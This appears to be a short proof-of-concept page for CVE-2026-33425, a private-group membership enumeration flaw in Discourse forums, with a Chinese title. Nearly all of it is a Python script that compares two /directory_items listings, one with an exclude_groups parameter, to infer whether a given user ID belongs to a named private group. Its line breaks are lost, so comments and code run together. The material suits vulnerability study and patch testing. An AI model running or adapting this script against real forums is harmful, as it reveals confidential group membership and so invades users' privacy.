CVE-2026-33425 Discourse私有组成员枚举漏洞

import requests # Target configuration target_url = "https://example.com" endpoint = "/directory_items" # Assume we found a user ID and a private group name suspect_user_id = "123" # ID of the user we want to check private_group_name = "confidential_staff" # Name of the private group # Step 1: Get default directory listing params_default = { "period": "all", "order": "created" } response_default = requests.get(f"{target_url}{endpoint}", params=params_default) user_exists_default = suspect_user_id in response_default.text # Step 2: Get directory listing excluding the specific private group params_exclude = { "period": "all", "order": "created", "exclude_groups": private_group_name } response_exclude = requests.get(f"{target_url}{endpoint}", params=params_exclude) user_exists_excluded = suspect_user_id in response_exclude.text # Step 3: Analyze the difference # If the user exists in default view but disappears when the group is excluded, # they are likely a member of that private group. if user_exists_default and not user_exists_excluded: print(f"[+] Confirmed: User ID {suspect_user_id} is a member of '{private_group_name}'.") elif user_exists_default and user_exists_excluded: print(f"[-] User ID {suspect_user_id} is likely NOT a member of '{private_group_name}'.") else: print(f"[?] User ID {suspect_user_id} not found or visibility settings changed.")